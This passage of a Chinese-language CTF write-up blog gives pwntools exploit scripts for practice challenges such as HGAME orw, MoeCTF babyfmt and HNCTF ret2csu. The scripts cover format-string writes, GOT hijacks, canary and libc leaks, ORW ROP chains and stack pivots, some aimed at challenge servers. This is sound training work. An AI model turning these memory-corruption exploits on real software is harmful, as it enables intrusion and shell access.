src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"680\" height=\"250\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-13.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-667\"  sizes=\"auto, (max-width: 680px) 100vw, 680px\" \/><\/div><\/figure>\n\n\n\n<p>\u683c\u4e32\uff0c\u5229\u7528\u4efb\u610f\u5199\u7279\u6027\u6539key\u503c\u5c31\u597d\u4e86<\/p>\n\n\n\n<p>key\u5728bss\u4e0a\uff0c\u5730\u5740\u5c31\u662f\u5df2\u77e5\u7684\uff0c\u5229\u7528pwntools\u7684fmtstr_payload\u80fd\u641e\u51fa\u6765\u4e00\u4e2a\u521d\u6b65\u7684fmt\u5229\u7528\u7684pd<\/p>\n\n\n\n<p>fmt = fmtstr_payload(6,{key:0x66})<\/p>\n\n\n\n<p>\u8fd0\u884c\u4e00\u4e0b\u770b\u770b\u5b9e\u9645\u7684\u8f93\u5165\uff1ab&#8217;%102c%8$llnaaaab\\xa0\\x10`\\x00\\x00\\x00\\x00\\x00&#8242;<\/p>\n\n\n\n<p>\u5bf9\u4f4d\u6539\u6539\uff0c\u5c31\u80fd\u6253\u51fa\u4e2arbp\u5730\u5740\u51fa\u6765<\/p>\n\n\n\n<p>pd = b&#8217;%102c%8$lln%28$p&#8217; + p64(key)<\/p>\n\n\n\n<p>\u5b9e\u9645\u8f93\u5165\u4e5f\u5c31\u662f\uff1a<\/p>\n\n\n\n<p>b&#8217;%102c%8$lln%28$p\\xa0\\x10`\\x00\\x00\\x00\\x00\\x00&#8242;<\/p>\n\n\n\n<p>\uff08\u8fd8\u662f\u5f88\u597d\u4e00\u773c\u76ef\u771f\u7684\u2026\u2026\u5427\uff09<\/p>\n\n\n\n<p>\u4f60\u95ee\u6211\u4e3a\u4ec0\u4e48\u662f28\uff1f<\/p>\n\n\n\n<p>\u683c\u4e32\u81ea\u5df1\u6d4b\u53bb\u5427\uff08\uff09<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-14-1024x469.png'><img class=\"lazyload lazyload-style-1\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"469\" data-original=\"https:\/\/www.okabe.xin\/wordpress\/wp-content\/uploads\/2025\/12\/image-14-1024x469.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"\" class=\"wp-image-668\"  sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/div><\/figure>\n\n\n\n<p>\uff08\u56fe\u91cc\u8f93\u5165\u768430\u4e2a%p\uff0c\u8fd9\u91cc\u5bf9\u4f4d\u770b\u5230\u7684rbp\u5c31\u662f\u7b2c28\u4f4d\uff09<\/p>\n\n\n\n<p>\u597d\u4e86\uff0csend\u4e4b\u540e\u5b8c\u6210rbp\u5730\u5740\u7684\u63a5\u6536\uff0c\u8fdb\u5165\u4e24\u6b21read\u7684\u73af\u8282<\/p>\n\n\n\n<p>\u597d\uff0c\u7b2c\u4e00\u6b21read\u5199\u5165\u7684\u5730\u5740\u662fbuf<\/p>\n\n\n\n<p>\u8fd8\u662fgdb\u6d4b\uff0c\u8fd9\u4e2a\u611f\u89c9\u6ca1\u5fc5\u8981\u591a\u8bf4\u4e86\uff0c\u770b\u770bexp\u91cc\u7684\u6d4b\u8bd5\u6ce8\u91ca\u5e94\u8be5\u5c31\u80fd\u7406\u89e3\u4e2a\u4e03\u4e03\u516b\u516b<\/p>\n\n\n\n<p>\u7136\u540e\uff0c\u7136\u540e\u611f\u89c9\u5c31\u6ca1\u591a\u5c11\u597d\u8bb2\u7684\u4e86<\/p>\n\n\n\n<p>\u7b2c\u4e8c\u6b21\u5199\u5165\u7684\u4f4d\u7f6e\u662fhdctf<\/p>\n\n\n\n<p>\u4e5f\u5728bss\u6bb5<\/p>\n\n\n\n<p>\u90a3rop\u94fe\u8def\u5c31\u5f02\u5e38\u660e\u6670\u4e86<\/p>\n\n\n\n<p>ret + rdi + \/bin\/sh\u7684\u76ee\u6807\u5199\u5165\u5730\u5740 + syscall<\/p>\n\n\n\n<p>\u7136\u540e\u8fd9\u4e2aljust\u586b\u5145\u4e00\u4e0b\uff0c\u4f7f\u5176\u5b8c\u6210\u6ea2\u51fa<\/p>\n\n\n\n<p>\u518d\u63a5\u4e2arbp\u548cleave\u5c31\u80fd\u5b9e\u73b0\u6211\u4eec\u7684\u76ee\u6807\u8df3\u8f6c<\/p>\n\n\n\n<p>\u53cd\u6b63\u662f\u7b2c\u4e8c\u6b21\u4f20\u5165\u7684\u65f6\u5019\u5199\u5165\/bin\/sh\u5230hdctf\u90a3\u53bb<\/p>\n\n\n\n<p>\u5199\u5b8c\u5c31getshell<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context(os='linux', arch='amd64', log_level='debug')<br>io = process(\".\/pwn\")<br># io = remote(\"node5.anna.nssctf.cn\",21184)<br>elf = ELF(\".\/pwn\")<br>\u200b<br>ret = 0x0000000000400581<br>pop_rdi = 0x0000000000400893<br>leave = 0x0000000000400758<br>key = 0x6010A0<br>syscall = 0x000000000400763<br>\u200b<br># \u8fdb\u4e24\u8bfb\u9636\u6bb5<br>io.recvuntil(b'you name?\\n\\n')<br>fmt = fmtstr_payload(6,{key:0x66})<br>pd = b'%102c%8$lln%28$p' + p64(key)<br>print(fmt) &nbsp; &nbsp;#b'%102c%8$llnaaaab\\xa0\\x10`\\x00\\x00\\x00\\x00\\x00'<br>print(pd) &nbsp; &nbsp; #b'%102c%8$lln%28$p\\xa0\\x10`\\x00\\x00\\x00\\x00\\x00'<br># gdb<br>#gdb.attach(io)<br>io.send(pd)<br>\u200b<br>#\u63a5\u6536rbp\u5730\u5740<br>io.recvuntil(b'0x')<br>rbp = int(io.recv()&#91;0:12],16)<br>rbp_a = hex(rbp)<br>success(rbp_a)<br>\u200b<br>#\u627etarget_addr<br># io.send(b'aaaa')<br>#  &#91;+] 0x7fff85963780<br># pwndbg&gt; search aaaa<br># Searching for byte: b'aaaa'<br># libc.so.6 &nbsp; &nbsp; &nbsp; 0x7f303df89943 0x61616161 \/* 'aaaa' *\/<br># &#91;stack] &nbsp; &nbsp; &nbsp; &nbsp; 0x7fff85963790 0x61616161 \/* 'aaaa' *\/<br># 0x7fff85963790 - 0x7fff85963780 = 0x10<br>target = rbp + 0x10<br>h_tar = hex(target)<br>success(h_tar)<br>offset = 0x30<br>hdctf = 0x0000000006010C0<br>\u200b<br>rop = p64(ret) + p64(pop_rdi) + p64(hdctf) + p64(syscall) <br>pd2 = rop.ljust(offset, b'\\x00')<br>pd2 += p64(target)<br>pd2 += p64(leave)<br>\u200b<br>#gdb.attach(io)<br>io.send(pd2)<br>io.recvuntil(b\"That's great.Do you like Minions?\\n\")<br>io.send(b'\/bin\/sh\\x00')<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HGAME 2023 week1]orw<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>\u250c\u2500\u2500(kali\u327fkali)-&#91;~\/\u684c\u9762\/NSS\/&#91;HGAME 2023 week1]orw]<br>\u2514\u2500$ seccomp-tools dump .\/vuln <br> line  CODE  JT &nbsp; JF &nbsp; &nbsp;  K<br>=================================<br> 0000: 0x20 0x00 0x00 0x00000000  A = sys_number<br> 0001: 0x15 0x02 0x00 0x0000003b &nbsp;if (A == execve) goto 0004<br> 0002: 0x15 0x01 0x00 0x00000142 &nbsp;if (A == execveat) goto 0004<br> 0003: 0x06 0x00 0x00 0x7fff0000  return ALLOW<br> 0004: 0x06 0x00 0x00 0x00000000  return KILL<\/code><\/pre>\n\n\n\n<p>\u5927\u6982\u4e5f\u731c\u5230\u600e\u4e48\u6253\u4e86<\/p>\n\n\n\n<p>orw\u6784\u9020rop\u94fe\uff0c\u770b\u5230\u6807\u7b7e\u662f\u6808\u8fc1\u79fb<\/p>\n\n\n\n<p>\u5927\u6982\u7387\u5e94\u8be5\u6709\u4e2a\u6570\u4e86<\/p>\n\n\n\n<p>vuln\u91cc\u7684read\u5199\u4e0d\u4e0b<\/p>\n\n\n\n<p>\u6240\u4ee5\u6253\u4e2a\u6808\u8fc1\u79fb<\/p>\n\n\n\n<p>\u5c31\u8fd9\u4e48\u4e2a\u4e8b<\/p>\n\n\n\n<p>rop\u94fe\u5f80\u53ef\u4ee5\u653e\u7684\u5730\u65b9\u5199\uff0c\u5199\u4e2aorw\u94fe\u5b50<\/p>\n\n\n\n<p>\u7136\u540e\uff0c\u63a7\u5236\u7a0b\u5e8f\u6d41\u8fc1\u79fb\u5230rop\u94fe\u4f4d\u7f6e<\/p>\n\n\n\n<p>\u7ed3\u675f<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>payload &nbsp;= b'\/flag\\00\\x00\\x00'<br>payload += p64(pop_rdi) + p64(bss)<br>payload += p64(pop_rsi) + p64(0)<br>payload += p64(open_addr)<br>\u200b<br>payload += p64(pop_rdi) + p64(3)<br>payload += p64(pop_rsi) + p64(bss)<br>payload += p64(pop_rdx) + p64(0x100)<br>payload += p64(read_addr)<br>\u200b<br>payload += p64(pop_rdi) + p64(1)<br>payload += p64(pop_rsi) + p64(bss)<br>payload += p64(pop_rdx) + p64(0x100)<br>payload += p64(write_addr)<br>\u200b<br>payload &nbsp;= payload.ljust(0x100, b'\\x00')<br>payload += p64(bss) + p64(leave)<br>io.send(payload)<\/code><\/pre>\n\n\n\n<p> <strong>1. open(&#8220;\/flag&#8221;, 0)<\/strong><\/p>\n\n\n\n<p>\u8981\u8bbe\u7f6e\u7684\u5bc4\u5b58\u5668\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u5bc4\u5b58\u5668<\/th><th>\u503c<\/th><th>\u89e3\u91ca<\/th><\/tr><\/thead><tbody><tr><td><strong>rdi<\/strong><\/td><td>\u6587\u4ef6\u540d\u5730\u5740<\/td><td>open \u7684\u7b2c 1 \u4e2a\u53c2\u6570<\/td><\/tr><tr><td><strong>rsi<\/strong><\/td><td>0<\/td><td>open \u7684 flags \u53c2\u6570\uff08\u53ea\u8bfb\uff09<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">b\"\/flag\\x00\\x00\\x00\" &nbsp; &nbsp; # filename \u5b57\u7b26\u4e32<br>pop_rdi; bss &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# rdi = &amp;\"\/flag\"<br>pop_rsi; 0 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# rsi = 0 (O_RDONLY)<br>open_addr &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # \u8c03\u7528 open()<\/pre>\n\n\n\n<p><strong>\u6548\u679c\uff1a<\/strong> <code>open(\"\/flag\", 0)<\/code> \u7cfb\u7edf\u5c06\u8fd4\u56de fd=3\uff08\u524d 0,1,2 \u5df2\u5360\u7528\uff09\u3002<\/p>\n\n\n\n<p><strong>2. read(3, bss, 0x100)<\/strong><\/p>\n\n\n\n<p>\u8981\u8bbe\u7f6e\u7684\u5bc4\u5b58\u5668\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u5bc4\u5b58\u5668<\/th><th>\u503c<\/th><th>\u89e3\u91ca<\/th><\/tr><\/thead><tbody><tr><td><strong>rdi<\/strong><\/td><td>3<\/td><td>open \u8fd4\u56de\u7684\u6587\u4ef6\u63cf\u8ff0\u7b26<\/td><\/tr><tr><td><strong>rsi<\/strong><\/td><td>bss<\/td><td>\u5b58 flag \u7684\u7f13\u51b2\u533a<\/td><\/tr><tr><td><strong>rdx<\/strong><\/td><td>0x100<\/td><td>read \u8bfb\u53d6\u7684\u957f\u5ea6<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">pop_rdi; 3 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # rdi = 3 &nbsp; (fd)<br>pop_rsi; bss &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # rsi = buffer<br>pop_rdx; 0x100 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # rdx = length<br>read_addr &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp;# \u8c03\u7528 read()<\/pre>\n\n\n\n<p><strong>\u6548\u679c\uff1a<\/strong> <code>read(3, bss, 0x100)<\/code> \u5c06 flag \u5185\u5bb9\u8bfb\u5230 bss \u6bb5\u3002<\/p>\n\n\n\n<p> <strong>3. write(1, bss, 0x100)<\/strong><\/p>\n\n\n\n<p>\u8981\u8bbe\u7f6e\u7684\u5bc4\u5b58\u5668\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u5bc4\u5b58\u5668<\/th><th>\u503c<\/th><th>\u89e3\u91ca<\/th><\/tr><\/thead><tbody><tr><td><strong>rdi<\/strong><\/td><td>1<\/td><td>\u6807\u51c6\u8f93\u51fa<\/td><\/tr><tr><td><strong>rsi<\/strong><\/td><td>bss<\/td><td>flag \u7684\u5185\u5bb9<\/td><\/tr><tr><td><strong>rdx<\/strong><\/td><td>0x100<\/td><td>\u8f93\u51fa\u957f\u5ea6<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<pre class=\"wp-block-preformatted\">pop_rdi; 1 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # rdi = stdout<br>pop_rsi; bss &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # rsi = flag buffer<br>pop_rdx; 0x100 &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # rdx = length<br>write_addr &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; &nbsp; # \u8c03\u7528 write()<\/pre>\n\n\n\n<p><strong>\u6548\u679c\uff1a<\/strong> <code>write(1, bss, 0x100)<\/code> \u5c06 flag \u8f93\u51fa\u5230\u7ec8\u7aef\u3002<\/p>\n\n\n\n<p> <strong>4. leave;ret\uff08\u6808\u8fc1\u79fb\uff09<\/strong><\/p>\n\n\n\n<p>\u4e4b\u540e padding \u5230 0x100\uff0c\u7136\u540e\uff1a<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">payload += p64(bss) + p64(leave)<\/pre>\n\n\n\n<p>\u542b\u4e49\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u5bc4\u5b58\u5668\/\u64cd\u4f5c<\/th><th>\u89e3\u91ca<\/th><\/tr><\/thead><tbody><tr><td>rsp = bss<\/td><td>\u8ba9\u6808\u6307\u5411 ROP \u94fe\u6240\u5728\u4f4d\u7f6e<\/td><\/tr><tr><td>leave = mov rsp, rbp; pop rbp<\/td><td>\u6062\u590d\u6808\u5e27\uff0c\u7ee7\u7eed\u6267\u884c ROP<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>\u6784\u9020\u7684\u5bc4\u5b58\u5668\u503c\u5bf9\u5e94\u6548\u679c\u5982\u4e0b\uff1a<\/p>\n\n\n\n<figure class=\"wp-block-table\"><table class=\"has-fixed-layout\"><thead><tr><th>\u51fd\u6570<\/th><th>rdi<\/th><th>rsi<\/th><th>rdx<\/th><th>\u4f5c\u7528<\/th><\/tr><\/thead><tbody><tr><td>open<\/td><td>\u6587\u4ef6\u540d\u5730\u5740<\/td><td>0<\/td><td>\u2014<\/td><td>\u6253\u5f00\u6587\u4ef6<\/td><\/tr><tr><td>read<\/td><td>3<\/td><td>bss<\/td><td>0x100<\/td><td>\u8bfb\u53d6 flag<\/td><\/tr><tr><td>write<\/td><td>1<\/td><td>bss<\/td><td>0x100<\/td><td>\u8f93\u51fa flag<\/td><\/tr><\/tbody><\/table><\/figure>\n\n\n\n<p>exp:<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>#context.log_level = 'debug'<br>io = process(\".\/vuln\")<br># io = remote(\"node5.anna.nssctf.cn\",24095)<br>elf = ELF(\".\/vuln\")<br>libc = ELF(\".\/libc-2.31.so\")<br>\u200b<br>system = libc.symbols&#91;\"system\"]<br>ret = 0x000000000040101a<br>pop_rdi = 0x0000000000401393<br>leave = 0x00000000004012be<br>main = 0x0000000004012F0<br># \u6cc4\u6f0flibc\u57fa\u5740<br>puts_got = elf.got&#91;'puts']<br>puts_plt = elf.plt&#91;'puts']<br>\u200b<br>pd1 = b'a'*(0x108) + p64(pop_rdi) + p64(puts_got) + p64(puts_plt) + p64(main)<br>#gdb<br>#gdb.attach(io)<br>io.sendline(pd1)<br>io.recvuntil(b'Maybe you can learn something about seccomp, before you try to solve this task.\\n')<br>leak = io.recv()&#91;0:6]<br>leak = leak.ljust(8,b'\\x00')<br>leak = u64(leak)<br>h_leak = hex(leak)<br>success(f'puts addr = {h_leak}')<br>libc_base = leak - libc.symbols&#91;'puts']<br>h_base = hex(libc_base)<br>success(f'libc base = {h_base}')<br># &#91;+] puts addr = 0x70ef67573420<br># &#91;+] libc base = 0x70ef674ef000<br># 0x70ef674ef000 &nbsp; &nbsp; 0x70ef67511000 r--p &nbsp;  22000 &nbsp; &nbsp; &nbsp; 0 libc-2.31.so<br># \u6d4b\u8bd5\u7ed3\u679c\u4e00\u81f4<br># \u5e03\u7f6eorw<br>bss = 0x000000000404300<br>open_addr = libc_base + libc.symbols&#91;'open']<br>read_addr = libc_base + libc.symbols&#91;'read']<br>write_addr = libc_base + libc.symbols&#91;'write']<br>pop_rdx = libc_base + 0x0000000000142c92<br>pop_rsi = libc_base + 0x000000000002601f<br>\u200b<br>gdb.attach(io)<br>over = b'a'*(0x100) + p64(bss+0x100) + p64(0x4012CF) <br>io.sendline(over)<br>pause()<br>\u200b<br>payload = b'\/flag\\00\\x00\\x00' + p64(pop_rdi) + p64(bss) + p64(pop_rsi) + p64(0) + p64(open_addr)<br>payload += p64(pop_rdi) + p64(3) + p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(0x100) + p64(read_addr)<br>payload += p64(pop_rdi) + p64(1) +p64(pop_rsi) + p64(bss) + p64(pop_rdx) + p64(0x100) + p64(write_addr)<br>payload = payload.ljust(0x100, b'\\x00')<br>payload += p64(bss) + p64(leave) <br>io.send(payload)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HGAME 2022 week1]test your gdb<\/h2>\n\n\n\n<p><a href=\"https:\/\/oslike.github.io\/2023\/03\/10\/HGAME2022week1-test-your-gdb-wp\/\">HGAME2022week1-test your gdb &#8211; OSLike&#8217;s Blog<\/a><\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>\u200b<br>#io = process('.\/pwn')<br>io = remote(\"node5.anna.nssctf.cn\",22319)<br>\u200b<br># gdb.attach(io, 'b *0x401378')<br>\u200b<br># pause()<br>\u200b<br>backdoor = 0x401256<br>payload = p64(0xb0361e0e8294f147) + p64(0x8c09e0c34ed8a6a9)<br>io.recvuntil(b'word\\n')<br>io.send(payload)<br>io.recv(0x18)<br>canary = u64(io.recv(8))<br>log.success(\"canary: \" + (hex(canary)))<br>\u200b<br>payload = b'a' * (0x20 - 0x08) + p64(canary) + p64(0) + p64(backdoor)<br>io.sendline(payload)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[MoeCTF 2022]babyfmt<\/h2>\n\n\n\n<p>\u76f8\u5f53\u5e38\u89c4\u7684\u683c\u4e32\u52ab\u6301got\u8868\u5230\u540e\u95e8\u51fd\u6570<\/p>\n\n\n\n<p>\u552f\u4e00\u62bd\u8c61\u7684\u70b9\u5728\u4e8e\u5229\u7528\u5b83\u8f93\u51fa\u7684gift\u5730\u5740\u6253\u4e0d\u901a<\/p>\n\n\n\n<p>\u4e0d\u7406\u89e3\u4e3a\u4ec0\u4e48\u5b83gdb\u8c03\u8bd5\u8fd0\u884c\u51fa\u6765\u7684\u540e\u95e8\u51fd\u6570\u5730\u5740\u90fd\u662f\u5bf9\u7684<\/p>\n\n\n\n<p>\u4f46\u662f\u811a\u672c\u8fd0\u884c\u6536\u5230\u7684\u5c31\u662f\u4e0d\u5bf9<\/p>\n\n\n\n<p>\u5947\u4e86\u602a\u4e86<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">from pwn import *<br>context.log_level = 'debug'<br>io = process(\".\/pwn\")<br>elf = ELF(\".\/pwn\")<br># io = remote(\"node5.anna.nssctf.cn\",21351)<br>\u200b<br>#io.recvuntil(b'gift:')<br>#backdoor = io.recv()[1:10]<br>backdoor = elf.symbols[\"backdoor\"]<br>success(f\"backdoor = :{backdoor}\")<br>\u200b<br>printf_got = elf.got[\"printf\"]<br>pd = fmtstr_payload(11,{printf_got:backdoor})<br>io.send(pd)<br>\u200b<br>\u200b<br>io.interactive()<\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[HNCTF 2022 WEEK2]ret2csu<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>context.arch = 'amd64'<br>context.os = 'linux'<br>io = process(\".\/ret2csu\")<br>elf = ELF(\".\/ret2csu\")<br># libc = ELF(\".\/libc.so.6\")<br>libc = ELF(\"\/lib\/x86_64-linux-gnu\/libc.so.6\")#\u8fd9\u91cc\u662f\u4e3a\u4e86\u6d4b\u672c\u5730\uff0c\u4e0d\u5fc5\u5728\u610f\u8fd9\u4e2alibc\u6587\u4ef6<br># io = remote(\"node5.anna.nssctf.cn\",27035) <br>\u200b<br>ret = 0x000000000040101a<br>pop_rdi = 0x00000000004012b3<br>csu_addr = 0x0000000004012A6<br>mov_csu = 0x000000000401290<br>return_addr = 0x4011DC &nbsp;#\u8df3\u8f6c\u56demain\u51fd\u6570\u4e3a\u6253ret2libc\u505a\u51c6\u5907<br>write_got = elf.got&#91;'write']<br>\u200b<br>def csu(rsi,r15):<br>    # write(fd,buf,n) = write(rdi,rsi,rdx)<br>    pd = b'a'*(0x100 + 8)<br>    pd += p64(csu_addr) + p64(3) #\u968f\u4fbf\u8ddf\u4e00\u4e2a\u5c31\u597d<br>    pd += p64(0) #pop &nbsp; &nbsp; rbx ,rbx\u8981\u8bbe\u7f6e\u62100 \u56e0\u4e3a\u6709\u4e2acall r15+rbx*8\u7684\u6c47\u7f16<br>    pd += p64(1)<br>    pd += p64(1) #pop rdi<br>    pd += p64(rsi) # pop rsi<br>    pd += p64(8) # \u8bbe\u7f6e\u4e3a8\u662f\u56e0\u4e3awrite\u8981\u51998\u5b57\u8282\u7684\u5730\u5740\u51fa\u6765<br>    pd += p64(r15)<br>    pd += p64(mov_csu)<br>    pd += b'a'*56 + p64(0x4011DC) #\u52a056\u4e2a\u5b57\u7b26\u662f\u7528\u6765\u8df3\u8fc7csu\u76846\u4e2apop\u548c\u6700\u5f00\u59cb\u7684 add rsp 8\uff0c\uff086+1\uff09 * 8 = 56<br>    # &nbsp;  csu(1, &nbsp; write_got, 8, &nbsp; write_got, main_addr)<br>    #def csu(r12, r13, &nbsp; &nbsp; &nbsp; r14, r15, &nbsp; &nbsp; &nbsp; last):<br>    #def csu(rdi, rsi, &nbsp; &nbsp; &nbsp; rdx, r15, &nbsp; &nbsp; &nbsp; last)<br>    gdb.attach(io)<br>    io.sendline(pd)<br>    <br>    <br>csu(write_got,write_got)<br>io.recvuntil(b'Ok.\\n')<br>write = u64(io.recv(6).ljust(8,b'\\x00'))<br>print(hex(write))<br>libc_base = write - libc.symbols&#91;'write']<br>print(hex(libc_base))<br>system_add = libc_base + libc.symbols&#91;'system']<br>bin_sh_add = libc_base + next(libc.search(b'\/bin\/sh'))<br>payload=b'a'*264+p64(pop_rdi)+p64(bin_sh_add)+p64(system_add)<br>io.recvuntil(\"Input:\\n\")<br>\u200b<br>io.sendline(payload)<br>io.interactive()<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-preformatted\"><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">[CISCN 2019\u534e\u5357]PWN4<\/h2>\n\n\n\n<p>\u88abNSS\u9a97\u91d1\u5e01\u4e86<\/p>\n\n\n\n<p>\u597d\u5427\u5e76\u4e0d\u662f<\/p>\n\n\n\n<p>\u6b64\u9898\u53c2\u8003\u9694\u58c119\u5e74\u4e1c\u5357\u8d5b\u533a\u7684pwn2<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>context.arch = 'i386'<br>#io = process(\".\/pwn\")<br>io = remote('node5.anna.nssctf.cn',22934)<br>elf = ELF(\".\/pwn\")<br>\u200b<br>leave = 0x08048562<br>ret = 0x080483a6<br>system &nbsp;= 0x8048559<br>\u200b<br>\u200b<br>pd = b'a'*(0x28)<br>\u200b<br>\u200b<br>io.send(pd)<br>io.recvuntil(b'a'*(0x28))<br>\u200b<br>leak_ebp = u32(io.recv(4))<br>p = hex(leak_ebp)<br>log.success(f'leak ebp = {p}')<br>\u200b<br>padding = 0x10<br>s = 0x28<br>target = leak_ebp - s - padding<br>h_target = hex(target)<br>log.success(f'target = {h_target}')<br>\u200b<br>pd2 = p32(0)<br>pd2 += p32(ret)<br>pd2 += p32(system)<br>pd2 += p32(target + 0x4*4)<br>pd2 += b'\/bin\/sh\\x00'<br>pd2 = pd2.ljust(0x28,b'a')<br>pd2 += p32(target)<br>pd2 += p32(leave)<br>\u200b<br># gdb.attach(io)<br>io.send(pd2)<br>io.interactive()<\/code><\/pre>\n\n\n\n<p>\u80fd\u5f88\u5feb\u7684\u5224\u65ad\u51fa\u6765\u662f\u505a\u8fc7\u7684\u9898\u76ee\uff0c\u8fd9\u5f88\u597d<\/p>\n\n\n\n<p>\u4f46\u662f\u6253\u7684\u65f6\u5019\u603b\u662f\u5fd8\u8fd9\u5fd8\u90a3<\/p>\n\n\n\n<p>\u8fd8\u662f\u719f\u7ec3\u5ea6\u95ee\u9898<\/p>\n\n\n\n<p>\u8fd8\u662f\u5f97\u7ec3<\/p>\n\n\n\n<p>\u6068<\/p>\n\n\n\n<h1 class=\"wp-block-heading\">Polar<\/h1>\n\n\n\n<h2 class=\"wp-block-heading\">sandbox<\/h2>\n\n\n\n<p><code>$0<\/code>\u63d0\u6743<\/p>\n\n\n\n<h2 class=\"wp-block-heading\">creeper<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io = remote(\"1.95.36.136\",2095)<br>\u200b<br>pd = b'a'*(0xf)<br>io.send(pd)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u7b80\u5355\u6ea2\u51fa<\/h2>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>io = remote(\"1.95.36.136\",2080)<br>\u200b<br>offset = 0x30 + 8<br>sh = 0x000000000400596<br>ret = 0x0000000000400441<br>pd = b'a'*offset<br>pd += p64(ret)<br>pd += p64(sh)<br>\u200b<br>io.sendline(pd)<br>\u200b<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">\u6ca1\u4eba\u80fd\u62d2\u7edd\u732b\u732b<\/h2>\n\n\n\n<p>\u6ea2\u51fa\u8986\u76d6\u5185\u5bb9\uff0c\u83b7\u53d6shell<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>io = remote(\"1.95.36.136\",2148)<br># io = process(\".\/pwn\")<br>pd = b'a'*(32) +b'lovecat' + p64(0) <br># gdb.attach(io)<br>io.sendline(pd)<br>io.interactive()<\/code><\/pre>\n\n\n\n<h2 class=\"wp-block-heading\">easypwn2<\/h2>\n\n\n\n<p>\u6574\u6570\u5b89\u5168\u95ee\u9898<\/p>\n\n\n\n<p>\u5c31\u662f\u8981\u6c42\u4f20\u5165\u8d1f\u6570\u4f46\u662f\u4e0d\u80fd\u6709\u8d1f\u53f7<\/p>\n\n\n\n<p>\u5e38\u89c4<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>from pwn import *<br>context.log_level = 'debug'<br>io = process(\".\/pwn\")<br>#io = remote(\"1.95.36.136\",2108)<br>\u200b<br>pd = b'2147483648'<br># 